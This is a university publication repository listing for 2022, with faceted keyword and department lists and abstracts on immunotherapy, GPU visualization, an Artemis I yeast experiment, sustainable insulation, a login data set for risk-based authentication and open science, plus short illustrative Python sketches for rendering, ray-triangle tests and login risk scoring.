Refine
Departments, institutes and facilities
- Fachbereich Informatik (62)
- Fachbereich Angewandte Naturwissenschaften (53)
- Institut für Technik, Ressourcenschonung und Energieeffizienz (TREE) (47)
- Fachbereich Wirtschaftswissenschaften (43)
- Fachbereich Ingenieurwissenschaften und Kommunikation (33)
- Internationales Zentrum für Nachhaltige Entwicklung (IZNE) (21)
- Institut für funktionale Gen-Analytik (IFGA) (15)
- Institut für Verbraucherinformatik (IVI) (14)
- Institute of Visual Computing (IVC) (13)
- Institut für Cyber Security & Privacy (ICSP) (10)
- Institut für Sicherheitsforschung (ISF) (7)
- Fachbereich Sozialpolitik und Soziale Sicherung (5)
- Graduierteninstitut (5)
- Zentrum für Innovation und Entwicklung in der Lehre (ZIEL) (5)
- Centrum für Entrepreneurship, Innovation und Mittelstand (CENTIM) (4)
- Institut für Detektionstechnologien (IDT) (1)
- Sprachenzentrum (1)
Document Type
- Article (110)
- Conference Object (53)
- Part of a Book (16)
- Preprint (12)
- Research Data (6)
- Doctoral Thesis (5)
- Master's Thesis (5)
- Report (4)
- Book (monograph, edited volume) (2)
- Conference Proceedings (2)
Year of publication
- 2022 (219)
Language
- English (219)
Keywords
- Machine Learning (5)
- virtual reality (4)
- Cathepsin K (3)
- GDPR (3)
- Knowledge Graphs (3)
- Lignin (3)
- usable privacy (3)
- 3D user interface (2)
- Bioinformatics (2)
- Chemometrics (2)
- Computer Vision (2)
- Control Systems and Automation (2)
- Deep Learning (2)
- Electrical Machines and Power Electronics (2)
- Enhanced weathering (2)
- HTS (2)
- Hydrogen storage (2)
- Intelligent controls (2)
- Natural Language Processing (2)
- Renewable Energy Systems (2)
- Rock dust (2)
- SERS (2)
- Security (2)
- Soil health (2)
- Sustainability (2)
- Transformers (2)
- Well-being (2)
- azadipeptide nitrile (2)
- biodiversity (2)
- creep (2)
- cyanohydrazide warhead (2)
- cytokine-induced killer cells (2)
- embedded systems (2)
- haptics (2)
- immunotherapy (2)
- interaction design (2)
- modeling (2)
- presenteeism (2)
- protease inhibitor (2)
- prototyping (2)
- relaxation (2)
- social robots (2)
- structure (2)
- sustainable development goals (2)
- synchronous generator (2)
- 1H (1)
- 3-hydroxyisobutyrate dehydrogenase (1)
- 3-hydroxyisobutyric acid dehydrogenase deficiency (1)
- 3-hydroxyisobutyric aciduria (1)
- 3D Segmentation (1)
- ADA2 (1)
- AI usage in sports (1)
- ANSYS (1)
- AOP (1)
- APC superfamily (1)
- ASR (1)
- ATB0,+ (1)
- Abstract Syntax Tree (1)
- Adaptive mesh refinement (1)
- Additiv (1)
- Adoption Factors (1)
- Adsorption (1)
- Aerogel (1)
- Aerosol (1)
- Agri-environment schemes (1)
- Air Pollution Monitoring (1)
- Alzheimer’s disease (1)
- Ammoniak (1)
- Anthropocene (1)
- Antimicrobial activity (1)
- Antioxidans (1)
- Antioxidant activity (1)
- Antiresorptive (1)
- Applications in Energy Transport (1)
- Artificial Intelligence (1)
- Artificial Intelligence (cs.AI) (1)
- AuNPs (1)
- Augmented Lagrangian (1)
- Augmented Reality (1)
- Autism Spectrum Disorder (1)
- Autonomous Driving (1)
- Autonomy (1)
- BCFA (1)
- BDF methods (1)
- Bachelor’s program (1)
- Backorder prediction (1)
- Ballastless track (1)
- Bayesian CFA (1)
- Beacon Chain (1)
- Benzoyl-coenzym A (1)
- Bibliographic Analysis (1)
- Biochemicals (1)
- Bioenergy (1)
- Biomass (1)
- Biometric data (1)
- Biopolymers (1)
- Biosignatures (1)
- Bisphosphonates (1)
- Board (1)
- Bodengesundheit (1)
- Bounding box explanations (1)
- Brand (1)
- Brand identity (1)
- Brand image (1)
- Business Incubation Center (1)
- Business statistics (1)
- CD40, CTLA-4 (1)
- CNN (1)
- COVID-19 (1)
- COVID‐19 (1)
- Capital structure (1)
- Cellulose (1)
- Charakterisierung (1)
- Christmas trees (1)
- Cislunar (1)
- Classification explanations (1)
- Cloud computing (1)
- Coaching process (1)
- Codes (1)
- Collective action (1)
- Complementarity Problem (1)
- Complex Systems Modeling and Simulation (1)
- Complexity (1)
- Composites (1)
- Confidence intervals (1)
- Conformation (1)
- Constrained mechanical system (1)
- Contingency analysis (1)
- Corporate Social Responsibility (1)
- Crystal structure (1)
- Cucumber peel waste (1)
- Current research information systems (1)
- Cypher (1)
- DADA2 (1)
- DMA (1)
- DNA damage (1)
- DNA typing (1)
- DSC (1)
- Data Generation (1)
- Data literacy (1)
- Data protection by design (1)
- Data structures (1)
- Descriptive statistics (1)
- Differential Variational Inequality (1)
- Digital Energy Management (1)
- Digital Entrepreneurship Education (1)
- Digital Plumbing (1)
- Distance Perception (1)
- Düngemittel (1)
- Effective purpose specification (1)
- Electric circuit analysis (1)
- Employee Privacy (1)
- Entrepreneurial Intention (1)
- Entrepreneurial family (1)
- Entrepreneurial self-efficacy (1)
- Environment Perception (1)
- Ethereum (1)
- ExoMars (1)
- Experiment (1)
- Explainable Artificial Intelligence (XAI) (1)
- Explosives (1)
- Extrusionsblasformen (1)
- FOS: Computer and information sciences (1)
- Family business (1)
- Feedback (1)
- Fertilizer (1)
- Food security (1)
- Forklifts (1)
- GFRP (1)
- Gas transport simulation (1)
- Gasturbinenschaufel (1)
- Geometry (1)
- Georgien (1)
- Gesteinsmehl (1)
- Global explanation (1)
- Glutamin N-phenylacetyltransferase (1)
- Glycin N-acyltransferase (1)
- Glycine N-acyltransferase (1)
- Glycine conjugation (1)
- Glycogen storage disease type (1)
- Glyzinkonjugation (1)
- Gradient-based explanation methods (1)
- Graph Convolutional Neural Networks (1)
- Graph embeddings (1)
- Graph theory (1)
- Graphene (1)
- Gülle (1)
- HCI (1)
- HDBR (1)
- HIBADH (1)
- HIBADH deficiency (1)
- HS SPME–GC/MS (1)
- HSP90 (1)
- Hardware (1)
- Harnstoffzyklusdefekt (1)
- Health Promotion (1)
- Health care consumption (1)
- Health insurance (1)
- Hematopoietic stem cells (1)
- Hemp (1)
- High-speed track (1)
- Higher Education (1)
- Highly Automated Driving (1)
- Historical remarks (1)
- Human orientation perception (1)
- Human-Centered Design (1)
- Human-Food-Interaction (1)
- Human-robot interaction (1)
- Hydrogen (1)
- IR microspectroscopy (1)
- IaaS (1)
- Image representation (1)
- Inclusion (1)
- Index notions (1)
- Inductive statistics (1)
- Information Privacy (1)
- Institutional Analysis and Development (IAD) framework (1)
- Institutions of Sustainability (IoS) framework (1)
- Intelligent Process Automation (1)
- Interaction (1)
- Interaction effects (1)
- Interdisciplinarity (1)
- Interdisciplinary education (1)
- Interests (1)
- International sustainable development (1)
- Invisible AI (1)
- IoT (1)
- Isotherms (1)
- Isovalerianazidämie (1)
- Isovaleric acidemia (1)
- Job satisfaction (1)
- Ketogenic diet (1)
- Ketone body (1)
- Kinetics (1)
- Knowledge co-production (1)
- Kriechen (1)
- LSTM (1)
- Laboratory (1)
- Lebensdauervorhersage (1)
- LeuT (1)
- Ligands (1)
- Lignin-based composites (1)
- Linear viscoelasticity (1)
- Lineare Viskoelastizität (1)
- LoRa (1)
- LoRaWAN (1)
- Local explanation (1)
- Low-input crops (1)
- MAXQDA (1)
- MOX gas sensors (1)
- Machine Learning (cs.LG) (1)
- Malware (1)
- Marketplaces (1)
- Markov Cluster Algorithm (1)
- Markov chain Monte Carlo (1)
- Mars (1)
- Mass transport (1)
- Mathematical methods (1)
- Measure differential Inclusion (1)
- Mechanische Prüfung (1)
- Membrane Transport (1)
- Mesenchymal stem cells (1)
- Metabolic decompensation (1)
- Metal hydride storage (1)
- Microgravity (1)
- Miscanthus (1)
- Molecular dynamics (1)
- Molecular structure (1)
- Monocarboxylate transporter 1 (1)
- Moreau–Jean time stepping (1)
- Multi-object visualization (1)
- Multidisciplinary (1)
- NLP (1)
- NMR (1)
- NSS family (1)
- Nadelhölzer (1)
- Nafion™ (1)
- Nano-Systems (1)
- Nanoparticles (1)
- Negotiation of Taste (1)
- Neural Machine Translation (1)
- Neural representations (1)
- New study course (1)
- Nickel-based superalloy (1)
- Nickelbasis-Superlegierung (1)
- Noise reduction (1)
- Non-linear systems (1)
- O3/UV (1)
- OCT (1)
- Object Segmentation (1)
- Object detectors (1)
- One Health doctoral training (1)
- One Health implementation (1)
- Open Access (1)
- Orion (1)
- Osteoanabolic (1)
- Osteoporosis (1)
- PAD (1)
- PEM electrolysis (1)
- PLASM (1)
- PLS-regression (1)
- PV model (1)
- PaaS (1)
- Packaging (1)
- Pakistan (1)
- Parametric study (1)
- Part Segmentation (1)
- Partial differential-algebraic equations (1)
- Payment for Ecosystem Services (PES) (1)
- Perception (1)
- Perceptual Upright (1)
- Peren-Clement Index (PCI) (1)
- Performance (1)
- Permeation (1)
- Phase II Reaktion (1)
- Phenylacetyl-coenzym A (1)
- Photovoltaic cell (1)
- Point Cloud Segmentation (1)
- Policy instruments (1)
- Polymers (1)
- Polysaccharide derivatives (1)
- Positive emotions (1)
- Poverty (1)
- Power (1)
- Private equity (1)
- Probability calculation (1)
- Process phases (1)
- Program evaluation (1)
- Proof of Stake (1)
- Proximity (1)
- Py-EGA-MS (1)
- Py-GC/MS (1)
- Py-MS (1)
- Quantitative analysis of explanations (1)
- R-ratio (1)
- Raman spectroscopy (1)
- Raman-microspectroscopy (1)
- Ray tracing (1)
- Regenerative medicine (1)
- Research-practice-collaborations (1)
- Ressource (1)
- RheoTack analysis (1)
- Right to Informational Self-Determination (1)
- Robot-Assisted Therapy (1)
- Robotic Process Automation (1)
- Rosskastanie (1)
- Runge-Kutta methods (1)
- Röpke (1)
- Rüstow (1)
- SDG 3 (1)
- SDG 4 (1)
- SLC (1)
- SLC6 (1)
- SLC6A14 (1)
- SMPA loop (1)
- SQL (1)
- STARLIFE project (1)
- SaaS (1)
- Safety (1)
- Saliency maps (1)
- Sanity checks for explaining detectors (1)
- Scalability (1)
- Schneeglöckchen (1)
- Schwindung (1)
- Science Management (1)
- Self-assembling (1)
- Self-supervised learning (1)
- Semantic Segmentation (1)
- Semantic search (1)
- Service-based cloud computing (1)
- Silicon Carbides (1)
- Simulations (1)
- Simulator (1)
- Simulator sickness (1)
- Single family office (1)
- Social Protection (1)
- Social protection (1)
- Socio Informatics (1)
- Software Supply Chain (1)
- Sonar (1)
- Soziale Sicherheit (1)
- Sozialpolitik (1)
- Space radiation (1)
- Spectral effects (1)
- Spill-over (1)
- Stabilisator (1)
- Stabilization (1)
- Statistical estimation methods (1)
- Statistical signs and symbols (1)
- Statistical testing methods (1)
- Statistics for economics (1)
- Statistics formulary (1)
- Supervised learning (1)
- Sustainable development (1)
- Sustainable engineering (1)
- Synergie (1)
- TD-GC/MS (1)
- TGA-FTIR (1)
- TGA-MS (1)
- TLS (1)
- TOC (1)
- Tap water (1)
- Taste (1)
- Thermochemical conversion (1)
- Thermodynamics (1)
- Three-dimensional displays (1)
- Thyme (1)
- Thymian (1)
- TiO2-coatings (1)
- Topological reduction (1)
- Topology (1)
- Transdisciplinary research (1)
- Transfer learning (1)
- Transformation Management (1)
- Treatment (1)
- UV (1)
- UXD (1)
- Underwater (1)
- Unilateral Constraints (1)
- Universal health care (1)
- University students (1)
- Urinary organic acids (1)
- Usable Security (1)
- User Experience (1)
- User-Centered Design (1)
- VOCs (1)
- VOSviewer (1)
- Verbal and non-verbal communication (1)
- Verification systems (1)
- Verzug (1)
- Video analysis (1)
- Visually induced motion sickness (1)
- Voight-Kampff test (1)
- Voltage measurement (1)
- Web scraping (1)
- Weihnachtsbaum (1)
- West Africa (1)
- Winery (1)
- Wizard of Oz (1)
- Working relationship (1)
- Workload (1)
- Work‐life balance (1)
- X-ray (1)
- Yeast (1)
- ability to study (1)
- acceptance (1)
- adaptive trigger (1)
- additive (1)
- adhesion factor (1)
- advanced applications (1)
- aircraft engine part (1)
- aluminum bonding wire (1)
- ambientes restauradores (1)
- ambiguity (1)
- amino acid transporter (1)
- ammonia (1)
- anabolic (1)
- anaplastic lymphoma kinase (1)
- annotation (1)
- anti-TNF (1)
- antibiotic prophylaxis (1)
- antioxidant (1)
- análisis factoriales confirmatorios (1)
- appropriation (1)
- armature winding (1)
- attention restoration (1)
- attitude-behavior gap for sustainability (1)
- augmented reality (1)
- authentication (1)
- authoring (1)
- autologous bone graft (1)
- automatic measurement validation (1)
- automatic music generation (1)
- automotive lever (1)
- autonomous explanation generation (1)
- autonomy (1)
- bacteria (1)
- benchtop (1)
- benzoyl-coA (1)
- beschleunigte Verwitterung (1)
- biaxial stretching (1)
- bio-based (1)
- bio-chemicals (1)
- biobasiert (1)
- biochemical fingerprinting (1)
- bioenergy (1)
- biomarker (1)
- biomaterial (1)
- biometrics (1)
- blockchain (1)
- blown film extrusion (1)
- bone mineral density (1)
- bone remodeling (1)
- cabbage waste (1)
- cafeteria (1)
- capability approach (1)
- cardiac magnetic resonance (1)
- catabolic (1)
- cell viability (1)
- chain-extending cross-linker (1)
- characterization (1)
- chemosensing (1)
- cholesteric phase (1)
- chromanones (1)
- circular economy (1)
- classification (1)
- clinical trials (1)
- co-design (1)
- coffee ring effect (1)
- collision (1)
- combination of treatments (1)
- complex problems (1)
- composite materials (1)
- computational geometry (1)
- confirmatory factor analyses (1)
- coniferous woods (1)
- consumer behavior for sustainability (1)
- controller design (1)
- creep compliance (1)
- crystallization (1)
- cube in cube model (1)
- current limiting (1)
- cybersickness (1)
- decision support system (1)
- deformation behavior (1)
- dental implant (1)
- detaching (1)
- didactical method mix (1)
- differential-algebraic equations (1)
- digital co-creation (1)
- digital learning (1)
- discriminant analysis (1)
- double pulse test (1)
- drivers (1)
- drug delivery (1)
- eXplainable artificial intelligence (XAI) (1)
- eco-certification (1)
- eco-products (1)
- ecosystem services (1)
- education for sustainable development (1)
- educational psychology (1)
- elementary volume (1)
- elite athletes (1)
- elite sports (1)
- emotion recognition (1)
- employability (1)
- employee privacy (1)
- engaged university (1)
- engineering plastics (1)
- entrepreneurial intention (1)
- environmental certification (1)
- error analysis (1)
- eudaimonic well-being (1)
- explainability (1)
- explainable AI (1)
- extremophile (1)
- extrusion blow molding (1)
- facial emotion recognition (1)
- factor analysis (1)
- failure analysis (1)
- farmers (1)
- fault ride through (1)
- feature (1)
- feature selection (1)
- fertilizer (1)
- fiber composites (1)
- fingerprint (1)
- five-factor model (1)
- flexibility (1)
- flying (1)
- forensic genetics (1)
- freedom (1)
- fuel cell (1)
- fully superconducting (1)
- fully superconducting generator (1)
- gas transport networks (1)
- gas turbine blade (1)
- gas-to-power (1)
- generation Z (1)
- generational cohort (1)
- geopolymer (1)
- glass fibers (1)
- glutamine N-phenylacetyltransferase (1)
- green conservatism (1)
- grid-forming converter (1)
- guidance (1)
- halogen bonding (1)
- head down bed rest (1)
- health (1)
- health intervention (1)
- health management (1)
- health-promoting collaboration (1)
- healthy eating (1)
- hexahedron (1)
- high-order meshes (1)
- holiday (1)
- horse chestnut (1)
- human cholinesterases (1)
- human-centred design (1)
- human-robot interaction (HRI) (1)
- hybrid system (1)
- hydrides (1)
- hydrogen (1)
- hydrogen bonding (1)
- immune checkpoint inhibition programmed cell death-1 (1)
- impact monitoring (1)
- institutional analysis (1)
- integrative Simulation (1)
- integrative simulation (1)
- interaction architecture (1)
- interface design (1)
- intervention mechanisms (1)
- knowledge transfer (1)
- land use (1)
- language (1)
- latent class analysis (1)
- leave (1)
- leishmaniasis (1)
- life-detection (1)
- lifetime prediction (1)
- local chain orientation (1)
- low-cost air sensor (1)
- macrophages (1)
- mass society (1)
- mathematical and numerical algorithms and methods (1)
- measurement errors (1)
- mechanical testing (1)
- memories (1)
- mesenchymal stem cells (1)
- mesh generation (1)
- mesoscale coarse-graining (1)
- methylmalonic acidemia (1)
- microbial contamination (1)
- migration (1)
- mixed methods (1)
- mixed methods study (1)
- mixed reality (1)
- mobility intelligence (1)
- molecular docking (1)
- molecular weight determination (1)
- monoamine oxidases (1)
- motion sickness (1)
- multineurotarget agents (1)
- multisensory cues (1)
- multivariate statistics (1)
- music analysis (1)
- nachhaltig (1)
- nanomedicine (1)
- nature (1)
- nature-protected areas (1)
- neutral buoyancy (1)
- non-small cell lung cancer (1)
- nostalgia (1)
- nucleic acids (1)
- nudge (1)
- nudgeability (1)
- off-job crafting (1)
- optic flow (1)
- optical coherence tomography (1)
- oral history (1)
- organizational policy (1)
- organosolv (1)
- orthotropes prozessabhängiges Materialverhalten (1)
- orthotropic process-dependent material behavior (1)
- osteoblast (1)
- osteoclast (1)
- osteogenic potential (1)
- osteoporosis (1)
- ozonation (1)
- ozone (1)
- particulate composite (1)
- path tracing (1)
- pathophysiology (1)
- peer-assisted learning (1)
- personality traits (1)
- personalized behaviour model (1)
- phase II reaction (1)
- phase angle jump (1)
- phenylacetyl-coA (1)
- photonic sensing (1)
- physical exercise (1)
- pigments (1)
- poly(butylene adipate terephthalate) (1)
- poly(lactic acid) (1)
- polyethylene (1)
- power converter (1)
- power electronics (1)
- power semiconductors (1)
- presentation attack detection (1)
- pressure sensitive adhesives (1)
- prioritizable ranking (1)
- privacy by design (1)
- process-induced morphology (1)
- professors as mentors (1)
- propionic acidemia (1)
- protein microarray (1)
- psicometría (1)
- psychometrics (1)
- psychophysics (1)
- qualitative research (1)
- questionnaire (1)
- rate of change of frequency (1)
- reCAPTCHA (1)
- real-time (1)
- recovery (1)
- remembering (1)
- renal cell carcinoma (1)
- representation learning (1)
- ressources (1)
- restauración de la atención (1)
- restorative environments (1)
- retraction speed dependency (1)
- right to access (1)
- rock powder (1)
- rubbers (1)
- scaffolds (1)
- security and privacy literacy (1)
- self-determination theory (1)
- self-motion perception (1)
- sensor array (1)
- sensor phenomena and characterization (1)
- sensory characterisation (1)
- sentiment analysis (1)
- shared mobility (1)
- short tandem repeat (STR) (1)
- shrinkage (1)
- simulation and modeling (1)
- situation awareness (1)
- slope based signature (1)
- slurry (1)
- small-scale fatigue testing (1)
- snowdrop (1)
- social Innovation (1)
- social activities (1)
- social exchange theory (1)
- social media (1)
- social order (1)
- socially engaged university (1)
- socio-interactive explanation generation (1)
- solute carrier (1)
- space flight analog (1)
- space radiation environment (1)
- speech emotion recognition (1)
- stakeholder analysis (1)
- storytelling (1)
- stress response (1)
- structural equation modeling (1)
- structural policy (1)
- student activating approaches (1)
- students (1)
- subjective visual vertical (1)
- superconductor (1)
- supramolecular liquid crystals (1)
- surrogate endpoint (1)
- susceptibility (1)
- sustainability-oriented behavior (1)
- sustainable (1)
- sustainable mobility (1)
- synergism (1)
- systemic approach (1)
- systemic regional innovation (1)
- technological innovation (1)
- thermal comfort modelling (1)
- thermal insulation materials (1)
- thermochemical conversion (1)
- thermophoresis (1)
- thermosensing (1)
- third mission (1)
- time series analysis (1)
- tissue engineering (1)
- traffic surveillance (1)
- transfer office (1)
- transparency (1)
- transparency-enhancing technologies (1)
- travel techniques (1)
- triiodothyronine (1)
- triple helix (1)
- ultrapure water (1)
- university–government relations (1)
- urban development (1)
- urea cycle defect (1)
- usability (1)
- user journey (1)
- user study (1)
- user-centered explanation generation (1)
- valine catabolic pathway (1)
- vection (1)
- vibration (1)
- view management (1)
- virtual reality, XR (1)
- vital policy (1)
- warpage (1)
- weight perception (1)
- welfare state (1)
- whole genome amplification (WGA) (1)
- wide band gap (1)
- wind energy (1)
- work ability (1)
- σ1 and σ2 receptors (1)
- DRAMMA model (1)
- integrative needs model of crafting (1)
- leisure crafting (1)
- needs satisfaction (1)
- needs-based (1)
- optimal functioning (1)
- validation (1)
Cytokine-induced killer (CIK) cells in combination with dendritic cells (DCs) have shown favorable outcomes in renal cell carcinoma (RCC), yet some patients exhibit recurrence or no response to this therapy. In a broader perspective, enhancing the antitumor response of DC-CIK cells may help to address this issue. Considering this, we investigated the effect of anti-CD40 and anti-CTLA-4 antibodies on the antitumor response of DC-CIK cells against RCC cell lines. Our analysis showed that (a) the anti-CD40 antibody (G28.5) increased the CD3+CD56+ effector cells of CIK cells by promoting the maturation and activation of DCs, (b) G28.5 also increased CTLA-4 expression in CIK cells via DCs, but the increase could be hindered by the CTLA-4 inhibitor (ipilimumab), (c) adding ipilimumab was also able to significantly increase the proportion of CD3+CD56+ cells in DC-CIK cells, (d) anti-CD40 antibodies predominated over anti-CTLA-4 antibodies for cytotoxicity, apoptotic effect and IFN-γ secretion of DC-CIK cells against RCC cells, and (e) after ipilimumab treatment, the population of Tregs in CIK cells remained unaffected, but ipilimumab combined with G28.5 significantly reduced the expression of CD28 in CIK cells. Taken together, we suggest that the agonistic anti-CD40 antibody, rather than the CTLA-4 inhibitor, may improve the antitumor response of DC-CIK cells, particularly in RCC. In addition, we point towards the as yet unknown contribution of CD28 to the crosstalk between anti-CTLA-4 antibodies and CIK cells.
We describe a systematic approach for rendering time-varying simulation data produced by exa-scale simulations, using GPU workstations. The data sets we focus on use adaptive mesh refinement (AMR) to overcome memory bandwidth limitations by representing interesting regions in space with high detail. In particular, our focus is on data sets where the AMR hierarchy is fixed and does not change over time. Our study is motivated by the NASA Exajet, a large computational fluid dynamics simulation of a civilian cargo aircraft that consists of 423 simulation time steps, each storing 2.5 GB of data per scalar field, amounting to a total of 4 TB. We present strategies for rendering this time series data set with smooth animation and at interactive rates using current generation GPUs. We start with an unoptimized baseline and extend it step by step to support fast streaming updates. Our approach demonstrates how to push current visualization workstations and modern visualization APIs to their limits to achieve interactive visualization of exa-scale time series data sets.
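The core of such streaming updates is overlapping disk I/O for the next time step with rendering of the current one. The snippet below is a minimal double-buffered playback sketch in Python, not the authors' pipeline; `load_step`, `upload_to_gpu`, and `render` are hypothetical placeholders for the application's own I/O, buffer-update, and draw routines.

```python
import threading, queue

def streamed_playback(num_steps, load_step, upload_to_gpu, render):
    """Double-buffered playback: while time step t is rendered,
    time step t+1 is already being read on a background thread."""
    prefetched = queue.Queue(maxsize=1)          # at most one step in flight

    def loader():
        for t in range(num_steps):
            prefetched.put((t, load_step(t)))    # blocking file read / decompression

    threading.Thread(target=loader, daemon=True).start()
    for _ in range(num_steps):
        t, cpu_buffer = prefetched.get()         # usually ready when we need it
        gpu_buffer = upload_to_gpu(cpu_buffer)   # ideally updates a persistent GPU buffer
        render(gpu_buffer)                       # draw the current time step
```

With a bounded queue of size one, the loader can run at most one step ahead, which keeps host memory use constant while hiding most of the read latency.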
Modern GPUs come with dedicated hardware to perform ray/triangle intersections and bounding volume hierarchy (BVH) traversal. While the primary use case for this hardware is photorealistic 3D computer graphics, with careful algorithm design scientists can also use this special-purpose hardware to accelerate general-purpose computations such as point containment queries. This article explains the principles behind these techniques and their application to vector field visualization of large simulation data using particle tracing.
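As a concrete illustration of the point containment queries mentioned above, the following sketch shows the classic parity (even/odd crossing) test against a watertight triangle mesh using Möller–Trumbore ray/triangle intersection. This is a plain CPU reference in Python under the assumption of a closed mesh, with functions of our own naming; on ray-tracing hardware, the same ray would instead be traced through the hardware BVH and the hits counted there.

```python
import numpy as np

def ray_hits_triangle(origin, direction, v0, v1, v2, eps=1e-9):
    """Möller–Trumbore test: does the ray hit the triangle at some t > 0?"""
    e1, e2 = v1 - v0, v2 - v0
    p = np.cross(direction, e2)
    det = e1.dot(p)
    if abs(det) < eps:                       # ray parallel to triangle plane
        return False
    inv_det = 1.0 / det
    t_vec = origin - v0
    u = t_vec.dot(p) * inv_det
    if u < 0.0 or u > 1.0:
        return False
    q = np.cross(t_vec, e1)
    v = direction.dot(q) * inv_det
    if v < 0.0 or u + v > 1.0:
        return False
    return e2.dot(q) * inv_det > eps         # hit must lie in front of the origin

def point_inside(point, triangles):
    """Parity rule: a point lies inside a watertight mesh iff a ray from it
    crosses the surface an odd number of times."""
    direction = np.array([1.0, 0.0, 0.0])    # any fixed direction works
    hits = sum(ray_hits_triangle(point, direction, *tri) for tri in triangles)
    return hits % 2 == 1

# Unit tetrahedron as a closed mesh of four triangles
a, b, c, d = (np.array(v, float) for v in
              [(0, 0, 0), (1, 0, 0), (0, 1, 0), (0, 0, 1)])
tet_faces = [(a, b, c), (a, b, d), (a, c, d), (b, c, d)]
print(point_inside(np.array([0.1, 0.1, 0.1]), tet_faces))   # True
print(point_inside(np.array([1.0, 1.0, 1.0]), tet_faces))   # False
```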
When the Artemis missions launch, NASA's Orion spacecraft (and crew as of the Artemis II mission) will be exposed to the deep space radiation environment beyond the protection of Earth's magnetosphere. Hence, it is essential to characterize the effects of space radiation, microgravity, and the combination thereof on cells and organisms, i.e., to quantify any correlations between the deep space radiation environment, genetic variation, and induced genetic changes in cells. To address this, the Artemis I mission will include the Peristaltic Laboratory for Automated Science with Multigenerations (PLASM) hardware containing the Deep Space Radiation Genomics (DSRG) experiment. The scientific aims of DSRG are (i) to identify the metabolic and genomic pathways in yeast affected by microgravity, space radiation, and their combination, and (ii) to differentiate the effects of gravity and of radiation exposure on the ability of single-gene deletion/overexpression strains to thrive in the spaceflight environment. Yeast is used as a model system because 70% of its essential genes have a human homolog, and over half of these homologs can functionally replace their human counterpart. As part of the experiment preparation towards spaceflight, an Experiment Verification Test (EVT) was performed at the Kennedy Space Center to verify that the experiment design, hardware, and approach to automated operations will enable achieving the scientific aims. For the EVT, fluidic systems were assembled, sterilized, loaded, and acceptance-tested, and subsequently integrated with the engineering parts to produce a flight-like PLASM unit. Each fluidic system consisted of (i) a Media Bag, (ii) four Culture Bags loaded with Saccharomyces cerevisiae (two with deletion series and the remaining two with overexpression series), and (iii) tubing and check valves. The EVT PLASM unit was put under a temperature profile replicating the anticipated different phases of flight, including handover to launch, spaceflight, and splashdown to handover back to the science team, for a 58-day period. At EVT completion, the rate of activation, cellular growth, RNA integrity, and sample contamination were interrogated. All of the experiment's success criteria were satisfied, encouraging our efforts to perform this investigation on Artemis I. This manuscript thus describes the process of spaceflight experiment design maturation with a focus on the EVT, its results, DSRG's preparation for its planned launch on Artemis I in 2022, and how the PLASM hardware can enable other scientific goals on future Artemis missions and/or the Lunar Orbital Platform – Gateway.
Intention: Within the research project EnerSHelF (Energy-Self-Sufficiency for Health Facilities in Ghana), energy-meteorological and load-related measurement data, among others, are collected, for which an overview of their availability is to be presented on a poster.
Context: In Ghana, total electricity consumption almost doubled between 2008 and 2018, according to the Energy Commission of Ghana. This goes along with an unstable power grid, resulting in power outages whenever electricity consumption peaks. These blackouts, called "dumsor" in Ghana, pose a severe burden on the healthcare sector. Innovative solutions are needed to reduce greenhouse gas emissions and improve energy and health access.
Approximately 45% of global greenhouse gas emissions are caused by the construction and use of buildings. Thermal insulation of buildings is a well-known strategy to improve their energy efficiency in the current context of climate change. The development of renewable insulation materials can overcome the drawbacks of widely used insulation systems based on polystyrene or mineral wool. This study analyzes the sustainability and thermal conductivity of new insulation materials made of Miscanthus x giganteus fibers, foaming agents, and alkali-activated fly ash binder. Life cycle assessments (LCA) are necessary to benchmark the environmental impacts of new formulations of geopolymer-based insulation materials. The global warming potential (GWP) of the product is primarily determined by the main binder component, sodium silicate, whose CO2 emissions depend on local production, transportation, and energy consumption. Values published in recent years vary widely, from 0.3 to 3.3 kg CO2-eq. per kg. The insulation system based on Miscanthus fibers, with properties meeting current thermal insulation regulations, achieves overall GWP savings of up to 95% in CO2 emissions compared to conventional systems. Carbon neutrality can be achieved through formulations containing raw materials with carbon dioxide emissions and renewable materials with negative GWP, thus balancing CO2 emissions.
Login Data Set for Risk-Based Authentication
Synthesized login feature data of >33M login attempts and >3.3M users on a large-scale online service in Norway. Original data collected between February 2020 and February 2021.
This data set aims to foster research and development of Risk-Based Authentication (RBA) systems (https://riskbasedauthentication.org). The data was synthesized from the real-world login behavior of more than 3.3M users at a large-scale single sign-on (SSO) online service in Norway.
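To illustrate what such a data set enables, the toy scorer below sketches the basic idea behind risk-based authentication: a login attempt is scored by how unusual its feature values are for that user compared to the whole service, loosely in the spirit of published likelihood-ratio RBA models. The class name, feature names, and smoothing are illustrative assumptions, not part of the data set or of any specific RBA product.

```python
from collections import Counter, defaultdict

class ToyRbaScorer:
    """Minimal illustrative risk scorer for login attempts (not a production model)."""

    def __init__(self, smoothing=1.0):
        self.global_counts = defaultdict(Counter)                     # feature -> value -> count
        self.user_counts = defaultdict(lambda: defaultdict(Counter))  # user -> feature -> value -> count
        self.smoothing = smoothing

    def observe(self, user, features):
        """Record one successful login with its feature values."""
        for name, value in features.items():
            self.global_counts[name][value] += 1
            self.user_counts[user][name][value] += 1

    def risk(self, user, features):
        """Higher score = value is rare for this user but common on the service."""
        score = 1.0
        for name, value in features.items():
            g, u = self.global_counts[name], self.user_counts[user][name]
            p_global = (g[value] + self.smoothing) / (sum(g.values()) + self.smoothing)
            p_user = (u[value] + self.smoothing) / (sum(u.values()) + self.smoothing)
            score *= p_global / p_user
        return score

scorer = ToyRbaScorer()
for _ in range(2):
    scorer.observe("alice", {"country": "NO", "browser": "Firefox"})
    scorer.observe("bob", {"country": "CN", "browser": "Edge"})
print(scorer.risk("alice", {"country": "NO", "browser": "Firefox"}))  # low (typical for alice)
print(scorer.risk("alice", {"country": "CN", "browser": "Edge"}))     # higher (atypical for alice)
```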
Guzzo et al. (2022) argue that open science practices may marginalize inductive and abductive research and preclude leveraging big data for scientific research. We share their assessment that the hypothetico-deductive paradigm has limitations (see also Staw, 2016) and that big data provide grand opportunities (see also Oswald et al., 2020). However, we arrive at very different conclusions. Rather than opposing open science practices that build on a hypothetico-deductive paradigm, we should take initiative to do open science in a way compatible with the very nature of our discipline, namely by incorporating ambiguity and inductive decision-making. In this commentary, we (a) argue that inductive elements are necessary for research in naturalistic field settings across different stages of the research process, (b) discuss some misconceptions of open science practices that hide or discourage inductive elements, and (c) propose that field researchers can take ownership of open science in a way that embraces ambiguity and induction. We use an example research study to illustrate our points.
